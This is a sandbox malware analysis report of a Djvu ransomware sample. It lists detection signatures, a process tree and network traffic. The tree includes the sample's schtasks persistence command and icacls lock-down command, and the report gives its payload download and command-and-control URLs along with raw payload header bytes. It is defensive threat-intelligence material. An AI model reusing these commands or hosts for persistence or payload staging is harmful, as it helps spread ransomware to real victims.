Loading ...

Play interactive tourEdit tour

Windows Analysis Report TpZ10Hfjov.exe

Overview

General Information

Sample Name:TpZ10Hfjov.exe
Analysis ID:458803
MD5:11f5960ea7de49e5b29a775e3a0f1782
SHA1:1d742c7bd0584d27225b7cd6fd1f423ac831b43f
SHA256:44f6676314c6c50f2807f34a33335abd58ca254f95c213496205825257f7b4d6
Tags:exeTeamBot
Infos:

Most interesting Screenshot:

Detection

Djvu
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Djvu Ransomware
Contains functionality to inject code into remote processes
Infects executable files (exe, dll, sys, html)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains strange resources
Sample file is different than original file name gathered from version info
Social media urls found in memory data
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • TpZ10Hfjov.exe (PID: 6440 cmdline: 'C:\Users\user\Desktop\TpZ10Hfjov.exe' MD5: 11F5960EA7DE49E5B29A775E3A0F1782)
    • TpZ10Hfjov.exe (PID: 6584 cmdline: 'C:\Users\user\Desktop\TpZ10Hfjov.exe' MD5: 11F5960EA7DE49E5B29A775E3A0F1782)
      • icacls.exe (PID: 6704 cmdline: icacls 'C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d' /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: FF0D1D4317A44C951240FAE75075D501)
      • TpZ10Hfjov.exe (PID: 6764 cmdline: 'C:\Users\user\Desktop\TpZ10Hfjov.exe' --Admin IsNotAutoStart IsNotTask MD5: 11F5960EA7DE49E5B29A775E3A0F1782)
        • TpZ10Hfjov.exe (PID: 6824 cmdline: 'C:\Users\user\Desktop\TpZ10Hfjov.exe' --Admin IsNotAutoStart IsNotTask MD5: 11F5960EA7DE49E5B29A775E3A0F1782)
          • build3.exe (PID: 4176 cmdline: 'C:\Users\user\AppData\Local\bcce123f-47b1-4a2a-a389-92f65e204908\build3.exe' MD5: 0FEA771099E342FACD95A9D659548919)
            • build3.exe (PID: 6328 cmdline: 'C:\Users\user\AppData\Local\bcce123f-47b1-4a2a-a389-92f65e204908\build3.exe' MD5: 0FEA771099E342FACD95A9D659548919)
              • schtasks.exe (PID: 6192 cmdline: /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe' MD5: 15FF7D8324231381BAD48A052F85DF04)
                • conhost.exe (PID: 1680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • TpZ10Hfjov.exe (PID: 6796 cmdline: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exe --Task MD5: 11F5960EA7DE49E5B29A775E3A0F1782)
    • TpZ10Hfjov.exe (PID: 6908 cmdline: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exe --Task MD5: 11F5960EA7DE49E5B29A775E3A0F1782)
  • TpZ10Hfjov.exe (PID: 6968 cmdline: 'C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exe' --AutoStart MD5: 11F5960EA7DE49E5B29A775E3A0F1782)
    • TpZ10Hfjov.exe (PID: 7124 cmdline: 'C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exe' --AutoStart MD5: 11F5960EA7DE49E5B29A775E3A0F1782)
  • TpZ10Hfjov.exe (PID: 6056 cmdline: 'C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exe' --AutoStart MD5: 11F5960EA7DE49E5B29A775E3A0F1782)
    • TpZ10Hfjov.exe (PID: 6060 cmdline: 'C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exe' --AutoStart MD5: 11F5960EA7DE49E5B29A775E3A0F1782)
  • mstsca.exe (PID: 6204 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 0FEA771099E342FACD95A9D659548919)
    • mstsca.exe (PID: 6260 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 0FEA771099E342FACD95A9D659548919)
      • schtasks.exe (PID: 6240 cmdline: /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 6252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • mstsca.exe (PID: 6540 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 0FEA771099E342FACD95A9D659548919)
    • mstsca.exe (PID: 6628 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 0FEA771099E342FACD95A9D659548919)
  • mstsca.exe (PID: 6812 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 0FEA771099E342FACD95A9D659548919)
    • mstsca.exe (PID: 6708 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 0FEA771099E342FACD95A9D659548919)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.701857052.0000000004A80000.00000040.00000001.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
    0000000A.00000002.691494712.0000000004A60000.00000040.00000001.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
      0000000F.00000002.702014629.0000000000400000.00000040.00000001.sdmpSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
      • 0xe23ea:$s1: http://
      • 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
      • 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
      • 0x100b4f:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
      • 0x10472f:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
      • 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF
      • 0xe23ea:$f1: http://
      0000000F.00000002.702014629.0000000000400000.00000040.00000001.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
        00000003.00000002.658281915.0000000000400000.00000040.00000001.sdmpSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
        • 0xe23ea:$s1: http://
        • 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
        • 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
        • 0x100b4f:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
        • 0x10472f:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
        • 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF
        • 0xe23ea:$f1: http://
        Click to see the 25 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        6.2.TpZ10Hfjov.exe.4ab15a0.1.raw.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
        • 0xe0dea:$s1: http://
        • 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
        • 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
        • 0xff54f:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
        • 0x10312f:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
        • 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF
        • 0xe0dea:$f1: http://
        6.2.TpZ10Hfjov.exe.4ab15a0.1.raw.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
          8.1.TpZ10Hfjov.exe.400000.0.raw.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
          • 0xe23ea:$s1: http://
          • 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
          • 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
          • 0x100b4f:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
          • 0x10472f:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
          • 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF
          • 0xe23ea:$f1: http://
          8.1.TpZ10Hfjov.exe.400000.0.raw.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
            0.2.TpZ10Hfjov.exe.4a115a0.1.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
            • 0xdf7ea:$s1: http://
            • 0xfd898:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
            • 0xfdf28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
            • 0xfdf4f:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
            • 0x101b2f:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
            • 0xffa26:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF
            • 0xdf7ea:$f1: http://
            Click to see the 23 entries

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for URL or domainShow sources
            Source: http://astdg.top/files/1/build3.exeAvira URL Cloud: Label: malware
            Source: http://securebiz.org/dl/build2.exe$runAvira URL Cloud: Label: malware
            Source: http://securebiz.org/dl/build2.exeAvira URL Cloud: Label: malware
            Source: http://securebiz.org/dl/build2.exerunAvira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URLShow sources
            Source: http://astdg.top/files/1/build3.exeVirustotal: Detection: 20%Perma Link
            Multi AV Scanner detection for submitted fileShow sources
            Source: TpZ10Hfjov.exeVirustotal: Detection: 33%Perma Link
            Source: TpZ10Hfjov.exeReversingLabs: Detection: 36%
            Machine Learning detection for sampleShow sources
            Source: TpZ10Hfjov.exeJoe Sandbox ML: detected
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,
            Source: TpZ10Hfjov.exe, 00000008.00000003.737963616.00000000007F6000.00000004.00000001.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----

            Compliance:

            barindex
            Detected unpacking (overwrites its own PE header)Show sources
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeUnpacked PE file: 3.2.TpZ10Hfjov.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeUnpacked PE file: 8.2.TpZ10Hfjov.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeUnpacked PE file: 8.2.TpZ10Hfjov.exe.400000.0.unpack
            Source: TpZ10Hfjov.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeFile created: C:\_readme.txtJump to behavior
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeFile created: C:\Users\user\_readme.txtJump to behavior
            Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.4:49741 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.4:49744 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.4:49747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.4:49748 version: TLS 1.2
            Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: TpZ10Hfjov.exe
            Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: TpZ10Hfjov.exe, 00000000.00000002.652637275.0000000004A10000.00000040.00000001.sdmp, TpZ10Hfjov.exe, 00000003.00000002.658281915.0000000000400000.00000040.00000001.sdmp, TpZ10Hfjov.exe, 00000006.00000002.665074291.0000000004AB0000.00000040.00000001.sdmp, TpZ10Hfjov.exe, 00000007.00000002.669744021.00000000049E0000.00000040.00000001.sdmp, TpZ10Hfjov.exe, 00000008.00000002.811793069.0000000000400000.00000040.00000001.sdmp

            Spreading:

            barindex
            Infects executable files (exe, dll, sys, html)Show sources
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeSystem file written: C:\Users\user\AppData\Local\Temp\CR_94EB1.tmp\setup.exeJump to behavior
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_00410160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.4:49743 -> 187.170.252.73:80
            Source: TrafficSnort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.4:49745 -> 31.167.180.141:80
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 03 Aug 2021 17:00:14 GMTServer: Apache/2.4.6 (CentOS) PHP/5.6.40Last-Modified: Tue, 03 Aug 2021 10:44:32 GMTETag: "88200-5c8a55efa51ea"Accept-Ranges: bytesContent-Length: 557568Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8d 81 1b 60 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 58 07 00 00 0c 85 02 00 00 00 00 86 90 06 00 00 10 00 00 00 70 07 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 8b 02 00 04 00 00 05 1d 09 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 66 07 00 6c 00 00 00 ac 59 07 00 3c 00 00 00 00 20 8b 02 88 ce 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 30 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 20 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 56 07 00 00 10 00 00 00 58 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 24 a2 83 02 00 70 07 00 00 56 00 00 00 5c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 ce 00 00 00 20 8b 02 00 d0 00 00 00 b2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 03 Aug 2021 17:00:12 GMTServer: Apache/2.4.37 (Win64) PHP/5.6.40Last-Modified: Fri, 30 Jul 2021 22:50:56 GMTETag: "53c00-5c85f0d6fa061"Accept-Ranges: bytesContent-Length: 343040Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 30 61 35 58 74 00 5b 0b 74 00 5b 0b 74 00 5b 0b 6a 52 ce 0b 61 00 5b 0b 6a 52 d8 0b 08 00 5b 0b 6a 52 df 0b 4c 00 5b 0b 53 c6 20 0b 73 00 5b 0b 74 00 5a 0b e5 00 5b 0b 6a 52 d1 0b 75 00 5b 0b 6a 52 cf 0b 75 00 5b 0b 6a 52 ca 0b 75 00 5b 0b 52 69 63 68 74 00 5b 0b 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 37 c9 da 5e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 fa 01 00 00 ac e2 02 00 00 00 00 c0 1b 00 00 00 10 00 00 00 10 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 e4 02 00 04 00 00 e2 55 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 60 95 02 00 50 00 00 00 00 40 e3 02 f0 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 e3 02 34 1a 00 00 60 12 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 02 00 18 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 f9 01 00 00 10 00 00 00 fa 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 91 00 00 00 10 02 00 00 92 00 00 00 fe 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 8c e0 02 00 b0 02 00 00 12 01 00 00 90 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 56 00 00 00 40 e3 02 00 58 00 00 00 a2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 40 01 00 00 a0 e3 02 00 42 01 00 00 fa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: TpZ10Hfjov.exe, 00000008.00000003.673962407.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: http://www.facebook.com/
            Source: TpZ10Hfjov.exe, 00000008.00000003.674208862.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: http://www.twitter.com/
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
            Source: global trafficHTTP traffic detected: GET /fhsgtsspen6/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: astdg.top
            Source: global trafficHTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: securebiz.org
            Source: global trafficHTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: astdg.top
            Source: TpZ10Hfjov.exe, 00000008.00000003.738301997.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: "origin": "http://www.youtube.com" equals www.youtube.com (Youtube)
            Source: TpZ10Hfjov.exe, 00000008.00000003.738301997.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: "web_url": "http://www.youtube.com" equals www.youtube.com (Youtube)
            Source: TpZ10Hfjov.exe, 00000008.00000003.693224549.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: <domain>www.yahoo.com equals www.yahoo.com (Yahoo)
            Source: TpZ10Hfjov.exe, 00000008.00000003.673962407.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
            Source: TpZ10Hfjov.exe, 00000008.00000003.674208862.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
            Source: TpZ10Hfjov.exe, 00000008.00000003.674251727.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
            Source: unknownDNS traffic detected: queries for: api.2ip.ua
            Source: TpZ10Hfjov.exe, 00000008.00000003.738856480.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: http://angularjs.org
            Source: TpZ10Hfjov.exe, 00000008.00000002.812221942.0000000000810000.00000004.00000001.sdmpString found in binary or memory: http://astdg.top/fhsgtsspen6/get.php
            Source: TpZ10Hfjov.exe, 00000008.00000003.779851425.0000000000830000.00000004.00000001.sdmpString found in binary or memory: http://astdg.top/fhsgtsspen6/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true
            Source: TpZ10Hfjov.exe, 00000008.00000003.699919081.00000000091A7000.00000004.00000001.sdmpString found in binary or memory: http://astdg.top/files/1/build3.exe
            Source: TpZ10Hfjov.exe, 00000008.00000003.779795980.00000000007DC000.00000004.00000001.sdmpString found in binary or memory: http://astdg.top/files/1/build3.exe$run
            Source: TpZ10Hfjov.exe, 00000008.00000003.779795980.00000000007DC000.00000004.00000001.sdmpString found in binary or memory: http://astdg.top/files/1/build3.exe$runr
            Source: TpZ10Hfjov.exe, 00000008.00000003.684472749.00000000091A1000.00000004.00000001.sdmpString found in binary or memory: http://astdg.top/files/1/build3.exe1
            Source: TpZ10Hfjov.exe, 00000008.00000003.737963616.00000000007F6000.00000004.00000001.sdmpString found in binary or memory: http://astdg.top/files/1/build3.exerundd2
            Source: TpZ10Hfjov.exe, 00000008.00000003.684472749.00000000091A1000.00000004.00000001.sdmpString found in binary or memory: http://astdg.top/files/1/build3.exey
            Source: TpZ10Hfjov.exe, 00000008.00000003.738301997.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: http://clients2.google.com/service/update2/crx
